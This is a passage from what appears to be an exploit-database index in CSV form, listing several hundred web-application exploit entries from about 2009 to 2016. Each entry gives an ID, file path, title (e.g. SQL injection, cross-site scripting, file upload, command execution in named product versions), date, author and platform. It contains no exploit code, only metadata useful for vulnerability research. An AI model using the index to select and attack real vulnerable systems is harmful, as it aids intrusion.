E-Business - '/ibm/wpm/rule?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps, -34916,exploits/multiple/webapps/34916.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/user?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps, -34917,exploits/multiple/webapps/34917.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/webseal?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps, -34918,exploits/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19/7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443 -34919,exploits/php/webapps/34919.txt,"Skybluecanvas 1.1 r237 - 'admin.php' Directory Traversal",2009-07-16,MaXe,php,webapps, -34920,exploits/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure",2014-10-07,"Le Ngoc Son",asp,webapps, -34928,exploits/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps, -34929,exploits/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting",2014-10-09,"Frank Lycops",multiple,webapps, -34930,exploits/php/webapps/34930.txt,"Sitecore CMS 6.0.0 rev. 090120 - 'default.aspx' Cross-Site Scripting",2009-06-03,intern0t,php,webapps, -34933,exploits/php/webapps/34933.txt,"Flatnux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps, -34934,exploits/php/webapps/34934.pl,"Joomla! Component Projects 'com_projects' - SQL Injection / Local File Inclusion",2010-10-27,jos_ali_joe,php,webapps, -34935,exploits/php/webapps/34935.txt,"LES PACKS - 'ID' SQL Injection",2010-10-27,Cru3l.b0y,php,webapps, -34936,exploits/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 - 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps, -34937,exploits/php/webapps/34937.txt,"Feindura CMS Groupware - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2010-10-28,Justanotherhacker.com,php,webapps, -34939,exploits/php/webapps/34939.txt,"W-Agora 4.1.5 - Local File Inclusion / Cross-Site Scripting",2010-10-27,MustLive,php,webapps, -34940,exploits/php/webapps/34940.txt,"212Cafe WebBoard 2.90 Beta - 'view.php' Directory Traversal",2009-05-29,MrDoug,php,webapps, -34941,exploits/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 - 'q' Cross-Site Scripting",2009-05-25,SmOk3,php,webapps, -34942,exploits/php/webapps/34942.txt,"Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"dave b",php,webapps, -34944,exploits/php/webapps/34944.txt,"SmartOptimizer - Null Character Remote Information Disclosure",2010-11-01,"Francois Harvey",php,webapps, -34946,exploits/php/webapps/34946.txt,"WordPress Plugin cformsII 11.5/13.1 - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps, -34947,exploits/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 - Cross-Site Scripting / SQL Injection",2010-10-30,MustLive,php,webapps, -34948,exploits/asp/webapps/34948.txt,"Douran Portal 3.9.7.55 - Arbitrary File Upload / Cross-Site Scripting",2010-11-01,ITSecTeam,asp,webapps, -34951,exploits/php/webapps/34951.txt,"Online Work Order Suite - Login SQL Injection",2010-11-02,VSN,php,webapps, -34955,exploits/php/webapps/34955.txt,"Joomla! 1.5.x - SQL Error Information Disclosure",2010-11-05,"YGN Ethical Hacker Group",php,webapps, -34956,exploits/hardware/webapps/34956.txt,"Bosch Security Systems DVR 630/650/670 Series - Multiple Vulnerabilities",2014-10-14,dun,hardware,webapps, -34957,exploits/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Authentication Bypass",2014-10-14,Vulnerability-Lab,ios,webapps, -35022,exploits/php/webapps/35022.txt,"4homepages 4Images 1.7.x - 'categories.php' SQL Injection",2010-11-29,"Ahmed Atif",php,webapps, -34958,exploits/php/webapps/34958.py,"Croogo 2.0.0 - Arbitrary PHP Code Execution",2014-10-14,LiquidWorm,php,webapps, -34959,exploits/php/webapps/34959.txt,"Croogo 2.0.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-10-14,LiquidWorm,php,webapps, -34981,exploits/ios/webapps/34981.txt,"Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities",2014-10-15,Vulnerability-Lab,ios,webapps, -34965,exploits/php/webapps/34965.txt,"Change CMS 3.6.8 - Multiple Cross-Site Request Forgery Vulnerabilities",2014-10-14,"Krusty Hack",php,webapps, -34968,exploits/php/webapps/34968.txt,"YourMembers Plugin - Blind SQL Injection",2014-10-14,TranDinhTien,php,webapps, -34969,exploits/hardware/webapps/34969.html,"Tenda A32 Router - Cross-Site Request Forgery",2014-10-14,zixian,hardware,webapps, -34970,exploits/php/webapps/34970.py,"SEO Control Panel 3.6.0 - Authenticated SQL Injection",2014-10-14,"Tiago Carvalho",php,webapps, -34971,exploits/asp/webapps/34971.txt,"Angel Learning Management System 7.3 - 'pdaview.asp' Cross-Site Scripting",2010-11-05,"Wesley Kerfoot",asp,webapps, -34972,exploits/php/webapps/34972.txt,"Joomla! Component AutoArticles 3000 - SQL Injection",2010-11-05,jos_ali_joe,php,webapps, -34973,exploits/php/webapps/34973.txt,"WordPress Plugin FeedList 2.61.01 - 'handler_image.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps, -34974,exploits/php/webapps/34974.txt,"WordPress Plugin WP Survey And Quiz Tool 1.2.1 - Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps, -34994,exploits/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps, -34995,exploits/php/webapps/34995.txt,"Simea CMS - 'index.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps, -34984,exploits/php/webapps/34984.py,"Drupal 7.0 < 7.31 - SQL Injection (1)",2014-10-16,fyukyuk,php,webapps, -34988,exploits/php/webapps/34988.txt,"PHPShop 2.1 EE - 'name_new' Cross-Site Scripting",2010-11-10,MustLive,php,webapps, -34989,exploits/php/webapps/34989.txt,"WeBid 0.85P1 - Multiple Input Validation Vulnerabilities",2010-11-10,"John Leitch",php,webapps, -34990,exploits/php/webapps/34990.txt,"Ricoh Web Image Monitor 2.03 - Cross-Site Scripting",2010-11-09,thelightcosine,php,webapps, -34996,exploits/php/webapps/34996.txt,"Raised Eyebrow CMS - 'venue.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps, -34992,exploits/php/webapps/34992.txt,"Drupal 7.0 < 7.31 - SQL Injection (2)",2014-10-17,"Claudio Viviani",php,webapps, -34993,exploits/php/webapps/34993.php,"Drupal 7.32 - SQL Injection (PHP)",2014-10-17,"Dustin Dörr",php,webapps, -35004,exploits/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (1)",2010-11-18,"High-Tech Bridge SA",php,webapps, -35008,exploits/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps, -35012,exploits/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Cross-Site Scripting",2010-11-23,"Usman Saeed",multiple,webapps, -35015,exploits/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 - 'email.cgi' Cross-Site Scripting",2010-11-24,"Aliaksandr Hartsuyeu",cgi,webapps, -35016,exploits/php/webapps/35016.txt,"Easy Banner 2009.05.18 - '/member.php' Multiple SQL Injection / Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps, -35017,exploits/php/webapps/35017.txt,"Easy Banner 2009.05.18 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps, -35025,exploits/php/webapps/35025.html,"Car Portal 2.0 - 'car_make' Cross-Site Scripting",2010-11-29,"Underground Stockholm",php,webapps, -35026,exploits/php/webapps/35026.txt,"Joomla! Component com_storedirectory - 'id' SQL Injection",2010-11-30,XroGuE,php,webapps, -35027,exploits/php/webapps/35027.txt,"E-lokaler CMS 2 - Admin Login Multiple SQL Injections",2010-11-26,ali_err0r,php,webapps, -35028,exploits/php/webapps/35028.txt,"SmartBox - 'page_id' SQL Injection",2010-11-26,KnocKout,php,webapps, -35031,exploits/asp/webapps/35031.txt,"BugTracker.NET 3.4.4 - SQL Injection / Cross-Site Scripting",2010-11-30,BugTracker.NET,asp,webapps, -35035,exploits/cgi/webapps/35035.txt,"AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution",2010-11-30,StenoPlasma,cgi,webapps, -35036,exploits/php/webapps/35036.txt,"Joomla! Component Annuaire - 'index.php?id' SQL Injection",2010-12-02,"Ashiyane Digital Security Team",php,webapps, -35037,exploits/ios/webapps/35037.txt,"iFunBox Free 1.1 iOS - Local File Inclusion",2014-10-22,Vulnerability-Lab,ios,webapps,8000 -35038,exploits/ios/webapps/35038.txt,"File Manager 4.2.10 iOS - Code Execution",2014-10-22,Vulnerability-Lab,ios,webapps,80 -35039,exploits/windows/webapps/35039.rb,"DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit)",2014-10-22,"Glafkos Charalambous",windows,webapps, -35041,exploits/php/webapps/35041.py,"Feng Office 1.7.4 - Arbitrary File Upload",2014-10-23,"AutoSec Tools",php,webapps, -35042,exploits/php/webapps/35042.txt,"Feng Office 1.7.4 - Cross-Site Scripting",2014-10-23,"AutoSec Tools",php,webapps, -35043,exploits/php/webapps/35043.txt,"Contenido CMS 4.8.12 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps, -35044,exploits/php/webapps/35044.txt,"Alguest 1.1 - Multiple Cookie Authentication Bypass Vulnerabilities",2010-12-03,"Aliaksandr Hartsuyeu",php,webapps, -35045,exploits/asp/webapps/35045.txt,"DotNetNuke 5.5.1 - 'InstallWizard.aspx' Cross-Site Scripting",2010-12-03,"Richard Brain",asp,webapps, -35046,exploits/php/webapps/35046.txt,"Axway Secure Transport 5.1 SP2 - Arbitrary File Upload (via Cross-Site Request Forgery)",2014-10-23,"Emmanuel Law",php,webapps, -35047,exploits/hardware/webapps/35047.txt,"Dell SonicWALL Gms 7.2.x - Code Injection",2014-10-23,Vulnerability-Lab,hardware,webapps, -35048,exploits/asp/webapps/35048.txt,"Techno Dreams Articles & Papers Package 2.0 - 'ArticlesTablelist.asp' SQL Injection",2010-12-04,R4dc0re,asp,webapps, -35049,exploits/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 - 'faqlist.asp' SQL Injection",2010-12-04,R4dc0re,asp,webapps, -35050,exploits/php/webapps/35050.txt,"Alguest 1.1 - 'start' SQL Injection",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps, -35052,exploits/php/webapps/35052.txt,"Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion",2014-10-25,"Parvinder Bhasin",php,webapps, -35566,exploits/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps, -35056,exploits/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps, -35057,exploits/php/webapps/35057.py,"WordPress Plugin 0.9.7 / Joomla! Component 2.0.0 Creative Contact Form - Arbitrary File Upload",2014-10-25,"Claudio Viviani",php,webapps, -35127,exploits/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"XLabs Security",jsp,webapps,9090 -35060,exploits/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' SQL Injection",2010-12-07,KnocKout,php,webapps, -35063,exploits/php/webapps/35063.txt,"Zimplit CMS - 'zimplit.php?File' Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps, -35064,exploits/php/webapps/35064.txt,"Zimplit CMS - 'English_manual_version_2.php?client' Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps, -35065,exploits/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps, -35066,exploits/php/webapps/35066.txt,"WordPress Plugin Processing Embed 0.5 - 'pluginurl' Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps, -35067,exploits/php/webapps/35067.txt,"WordPress Plugin Safe Search - 'v1' Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps, -35072,exploits/php/webapps/35072.txt,"Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities",2010-12-08,"Justin Klein Keane",php,webapps, -35073,exploits/php/webapps/35073.txt,"WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection",2014-10-27,"Claudio Viviani",php,webapps,80 -35075,exploits/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series - Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps, -35076,exploits/multiple/webapps/35076.py,"HP Operations Agent - Cross-Site Scripting iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383 -35079,exploits/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation",2014-10-27,"Brandon Perry",jsp,webapps,8585 -35080,exploits/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80 -40333,exploits/php/webapps/40333.txt,"WordPress Plugin RB Agency 2.4.7 - Local File Disclosure",2016-09-05,"Persian Hack Team",php,webapps,80 -35082,exploits/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution",2014-10-27,Vulnerability-Lab,ios,webapps,1861 -35083,exploits/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent Cross-Site Scripting",2014-10-27,Vulnerability-Lab,ios,webapps, -35084,exploits/php/webapps/35084.txt,"WordPress Plugin Twitter Feed - 'url' Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps, -35085,exploits/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro - 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps, -35087,exploits/php/webapps/35087.txt,"net2ftp 0.98 (stable) - '/admin1.template.php' Local/Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps, -35088,exploits/php/webapps/35088.txt,"PHP State - 'id' SQL Injection",2010-12-09,jos_ali_joe,php,webapps, -35089,exploits/php/webapps/35089.txt,"Joomla! Component Jeformcr - 'id' SQL Injection",2010-12-09,FL0RiX,php,webapps, -35090,exploits/php/webapps/35090.txt,"Joomla! Component JExtensions Property Finder - 'sf_id' SQL Injection",2010-12-10,FL0RiX,php,webapps, -35091,exploits/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps, -35093,exploits/cgi/webapps/35093.txt,"BizDir 05.10 - 'f_srch' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps, -35094,exploits/php/webapps/35094.txt,"slickMsg 0.7-alpha - 'top.php' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps, -35096,exploits/php/webapps/35096.txt,"Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps, -35097,exploits/php/webapps/35097.txt,"Joomla! Component com_redirect 1.5.19 - Local File Inclusion",2010-12-13,jos_ali_joe,php,webapps, -35098,exploits/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80 -35099,exploits/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XML External Entity File Disclosure",2014-10-28,Portcullis,php,webapps,80 -35100,exploits/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80 -35102,exploits/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Unauthenticated Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80 -35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQL Injection",2014-11-11,"Anastasios Monachos",multiple,webapps, -35209,exploits/jsp/webapps/35209.txt,"ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps, -35106,exploits/php/webapps/35106.txt,"Cetera eCommerce - 'banner.php' Cross-Site Scripting",2010-12-11,MustLive,php,webapps, -35107,exploits/cfm/webapps/35107.txt,"Mura CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps, -35108,exploits/php/webapps/35108.txt,"MyBB 1.4.10 - 'tags.php' Cross-Site Scripting",2010-12-12,TEAMELITE,php,webapps, -35109,exploits/php/webapps/35109.txt,"PHP TopSites 2.1 - '/rate.php' Cross-Site Scripting / SQL Injection",2010-12-13,"c0de Hunters",php,webapps, -35110,exploits/php/webapps/35110.txt,"BlogCFC 5.9.6.001 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-14,"Richard Brain",php,webapps, -35111,exploits/php/webapps/35111.txt,"slickMsg - Cross-Site Scripting / HTML Injection",2010-12-15,"Aliaksandr Hartsuyeu",php,webapps, -35113,exploits/php/webapps/35113.php,"MAARCH 1.4 - Arbitrary File Upload",2014-10-29,"Adrien Thierry",php,webapps,80 -35114,exploits/php/webapps/35114.txt,"MAARCH 1.4 - SQL Injection",2014-10-29,"Adrien Thierry",php,webapps,80 -35116,exploits/php/webapps/35116.txt,"HP Insight Diagnostics Online Edition 8.4 - 'search.php' Cross-Site Scripting",2010-12-15,"Richard Brain",php,webapps, -35117,exploits/php/webapps/35117.txt,"Blog:CMS 4.2.1 e - Multiple HTML Injections / Cross-Site Scripting",2010-12-15,"High-Tech Bridge SA",php,webapps, -35118,exploits/php/webapps/35118.txt,"PHPRS - 'model-kits.php' SQL Injection",2010-12-16,KnocKout,php,webapps, -35120,exploits/php/webapps/35120.txt,"Radius Manager 3.6 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps, -35121,exploits/php/webapps/35121.txt,"Social Share - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps, -35122,exploits/php/webapps/35122.txt,"Social Share - 'postid' SQL Injection",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps, -35123,exploits/php/webapps/35123.txt,"Mafya Oyun Scrpti - 'profil.php' SQL Injection",2010-12-20,"DeadLy DeMon",php,webapps, -35124,exploits/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps, -35125,exploits/php/webapps/35125.txt,"OpenFiler - 'device' Cross-Site Scripting",2010-12-21,db.pub.mail,php,webapps, -35126,exploits/php/webapps/35126.txt,"Habari 0.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps, -35128,exploits/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Persistent Cross-Site Scripting",2014-10-31,"Ravi Rajput",hardware,webapps, -35129,exploits/php/webapps/35129.txt,"Who's Who Script - Cross-Site Request Forgery (Add Admin)",2014-10-31,"ZoRLu Bugrahan",php,webapps, -35131,exploits/php/webapps/35131.txt,"Social Share - 'Username' SQL Injection",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps, -35133,exploits/php/webapps/35133.txt,"WordPress Plugin Mediatricks Viva Thumbs - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps, -35134,exploits/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' HTML Injection",2010-12-21,"High-Tech Bridge SA",php,webapps, -35135,exploits/php/webapps/35135.txt,"Joomla! Component Classified - SQL Injection",2010-12-22,R4dc0re,php,webapps, -35136,exploits/php/webapps/35136.txt,"WordPress Plugin Accept Signups 0.1 - 'email' Cross-Site Scripting",2010-12-22,clshack,php,webapps, -35137,exploits/php/webapps/35137.txt,"Social Share - 'vote.php' HTTP Response Splitting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps, -35138,exploits/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - Cross-Site Scripting",2014-11-02,evi1m0,php,webapps, -35212,exploits/php/webapps/35212.txt,"WordPress Plugin / Joomla! Component XCloner - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80 -35140,exploits/php/webapps/35140.txt,"MyBB 1.6 - 'search.php?keywords' SQL Injection",2010-12-23,"Aung Khant",php,webapps, -35141,exploits/php/webapps/35141.txt,"MyBB 1.6 - 'private.php?keywords' SQL Injection",2010-12-23,"Aung Khant",php,webapps, -35142,exploits/php/webapps/35142.txt,"Social Share - 'search' Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps, -35143,exploits/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals - 'PageId' SQL Injection",2010-12-28,"non customers",php,webapps, -35145,exploits/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' SQL Injection",2010-12-27,Dr.NeT,php,webapps, -35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'disable_functions()' Bypass Command Injection (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps, -35149,exploits/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps, -35150,exploits/php/webapps/35150.php,"Drupal < 7.32 - Unauthenticated SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 -35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps, -35156,exploits/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 - 'help.php' Cross-Site Scripting",2010-12-28,waraxe,php,webapps, -35157,exploits/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 - 'searchnew.php' Cross-Site Scripting",2010-12-28,waraxe,php,webapps, -35159,exploits/php/webapps/35159.txt,"MODx CMS 2.2.14 - Cross-Site Request Forgery Bypass / Reflected Cross-Site Scripting / Persistent Cross-Site Scripting",2014-11-05,"Narendra Bhati",php,webapps, -35160,exploits/php/webapps/35160.txt,"Mouse Media Script 1.6 - Persistent Cross-Site Scripting",2014-11-05,"Halil Dalabasmaz",php,webapps, -35165,exploits/php/webapps/35165.txt,"WikLink 0.1.3 - 'getURL.php' SQL Injection",2011-01-05,"Aliaksandr Hartsuyeu",php,webapps, -35167,exploits/php/webapps/35167.txt,"Joomla! 1.0.x - 'ordering' Cross-Site Scripting",2011-01-06,"Aung Khant",php,webapps, -35168,exploits/asp/webapps/35168.txt,"BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure",2011-01-05,"Deniz Cevik",asp,webapps, -35169,exploits/jsp/webapps/35169.txt,"Openfire 3.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-05,"Walikar Riyaz Ahemed Dawalmalik",jsp,webapps, -35172,exploits/php/webapps/35172.txt,"PHP MicroCMS 1.0.1 - 'page_text' Cross-Site Scripting",2011-01-06,"High-Tech Bridge SA",php,webapps, -35181,exploits/jsp/webapps/35181.txt,"Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities",2014-11-06,"SEC Consult",jsp,webapps, -35185,exploits/php/webapps/35185.txt,"WonderCMS 0.3.3 - 'editText.php' Cross-Site Scripting",2011-01-04,"High-Tech Bridge SA",php,webapps, -35186,exploits/php/webapps/35186.txt,"WikLink 0.1.3 - Multiple SQL Injections",2011-01-10,"Aliaksandr Hartsuyeu",php,webapps, -35187,exploits/php/webapps/35187.txt,"Joostina 1.3 - 'index.php' Cross-Site Scripting",2011-01-08,MustLive,php,webapps, -35191,exploits/php/webapps/35191.txt,"CMS Tovar - 'tovar.php' SQL Injection",2011-01-11,jos_ali_joe,php,webapps, -35193,exploits/php/webapps/35193.txt,"vldPersonals 2.7 - Multiple Vulnerabilities",2014-11-10,"Mr T",php,webapps, -35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps, -35198,exploits/php/webapps/35198.txt,"phpSound Music Sharing Platform 1.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps, -35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps, -35203,exploits/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps, -35204,exploits/php/webapps/35204.txt,"WordPress Plugin Another WordPress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps, -35206,exploits/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"XLabs Security",php,webapps, -35313,exploits/php/webapps/35313.txt,"WordPress Plugin SP Client Document Manager 2.4.1 - SQL Injection",2014-11-21,"ITAS Team",php,webapps,80 -35208,exploits/hardware/webapps/35208.txt,"Barracuda - Multiple Unauthentication Logfile Downloads",2014-11-10,4CKnowLedge,hardware,webapps, -35292,exploits/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps, -35291,exploits/php/webapps/35291.txt,"Vanilla Forums 2.0.16 - 'Target' Cross-Site Scripting",2011-01-27,"YGN Ethical Hacker Group",php,webapps, -35295,exploits/php/webapps/35295.txt,"Joomla! Component com_frontenduseraccess - Local File Inclusion",2011-02-01,wishnusakti,php,webapps, -35296,exploits/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Cross-Site Scripting",2011-01-30,"Avram Marius",php,webapps, -35297,exploits/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps, -35298,exploits/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion",2011-02-01,"Yam Mesicka",php,webapps, -35221,exploits/php/webapps/35221.txt,"Piwigo 2.6.0 - 'picture.php?rate' SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 -35218,exploits/php/webapps/35218.txt,"WordPress Plugin SupportEzzy Ticket System 1.2.5 - Persistent Cross-Site Scripting",2014-11-12,"Halil Dalabasmaz",php,webapps,80 -35219,exploits/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps, -35220,exploits/multiple/webapps/35220.txt,"Joomla! Component com_hdflvplayer < 2.1.0.1 - SQL Injection",2014-11-13,"Claudio Viviani",multiple,webapps, -35222,exploits/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal",2014-11-13,"Anastasios Monachos",jsp,webapps, -35223,exploits/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted Arbitrary File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80 -35224,exploits/php/webapps/35224.txt,"MyBB 1.8.x - Multiple Vulnerabilities",2014-11-13,smash,php,webapps,80 -35227,exploits/php/webapps/35227.txt,"Alguest 1.1c-patched - 'elimina' SQL Injection",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps, -35228,exploits/php/webapps/35228.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-01-15,"Patrick de Brouwer",php,webapps, -35231,exploits/php/webapps/35231.txt,"Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' SQL Injection",2011-01-16,ShivX,php,webapps, -35233,exploits/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps, -35237,exploits/multiple/webapps/35237.txt,"Gogs - 'label' SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80 -35238,exploits/multiple/webapps/35238.txt,"Gogs - 'users'/'repos' '?q' SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps, -35239,exploits/php/webapps/35239.txt,"phpCMS 2008 V2 - 'data.php' SQL Injection",2011-01-17,R3d-D3V!L,php,webapps, -35245,exploits/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",php,webapps, -35246,exploits/php/webapps/35246.py,"Joomla! Component com_hdflvplayer < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps, -35248,exploits/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - Cross-Site Scripting",2014-11-15,"Halil Dalabasmaz",multiple,webapps, -35293,exploits/php/webapps/35293.txt,"Joomla! Component com_virtuemart 1.1.6 - SQL Injection",2011-01-31,"Andrea Fabrizi",php,webapps, -35288,exploits/php/webapps/35288.txt,"WordPress Plugin oQey-Gallery 0.2 - 'tbpv_domain' Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps, -35289,exploits/php/webapps/35289.txt,"WordPress Plugin FCChat Widget 2.1.7 - 'path' Cross-Site 